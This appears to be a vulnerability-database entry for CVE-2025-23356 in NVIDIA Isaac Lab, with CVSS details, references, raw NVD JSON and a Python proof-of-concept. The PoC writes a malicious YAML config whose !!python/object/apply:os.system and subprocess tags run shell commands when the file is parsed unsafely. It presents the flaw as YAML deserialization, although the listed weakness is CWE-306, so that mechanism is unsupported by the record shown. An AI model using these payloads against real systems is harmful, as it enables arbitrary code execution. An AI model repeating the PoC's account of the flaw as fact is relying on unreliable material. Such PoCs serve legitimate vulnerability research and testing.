CVE-2025-23356

Description

NVIDIA Isaac Lab contains a vulnerability in SB3 configuration parsing. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

NVIDIA Isaac Lab 所有使用不安全SB3配置解析器的版本（具体版本范围请参考NVIDIA官方安全公告）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-23356 PoC - NVIDIA Isaac Lab SB3 Config Parsing RCE
# Vulnerability: Unsafe YAML deserialization in SB3 configuration parser

import yaml
import os
import sys

# Malicious SB3 configuration file exploiting unsafe YAML deserialization
# The SB3 config parser uses yaml.load() without SafeLoader, allowing
# arbitrary Python object instantiation during config parsing.

malicious_config = """
# Malicious SB3 configuration with embedded Python code execution
algorithm: PPO

# Inject malicious payload via YAML Python object tag
policy_kwargs: !!python/object/apply:os.system
  - "id > /tmp/pwned.txt; touch /tmp/rce_evidence"

# Alternative: use subprocess for command execution
learning_rate: !!python/object/apply:subprocess.check_output
  - ["id"]

# Trigger code execution during config loading
env:
  class_name: !!python/object/new:subprocess.Popen
    args:
      - ["whoami"]
"""

def exploit(target_config_path):
    """
    Exploit CVE-2025-23356 by writing a malicious SB3 config file
    and triggering its parsing by NVIDIA Isaac Lab.
    """
    # Step 1: Write malicious configuration
    with open(target_config_path, 'w') as f:
        f.write(malicious_config)
    print(f"[+] Malicious config written to {target_config_path}")

    # Step 2: Trigger Isaac Lab to load the config
    # When Isaac Lab loads this config, yaml.load() will execute
    # the embedded Python code automatically
    print("[*] Waiting for Isaac Lab to parse the malicious config...")
    print("[*] Code execution will occur during config deserialization")

if __name__ == "__main__":
    config_path = sys.argv[1] if len(sys.argv) > 1 else "malicious_sb3_config.yaml"
    exploit(config_path)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-23356
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-23356
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-23356/
[4] VulDB https://vuldb.com/cve/CVE-2025-23356
[5] https://nvidia.custhelp.com/app/answers/detail/a_id/5708

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-23356", "sourceIdentifier": "[email protected]", "published": "2025-10-14T18:15:35.177", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Isaac Lab contains a vulnerability in SB3 configuration parsing. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5708", "source": "[email protected]"}]}}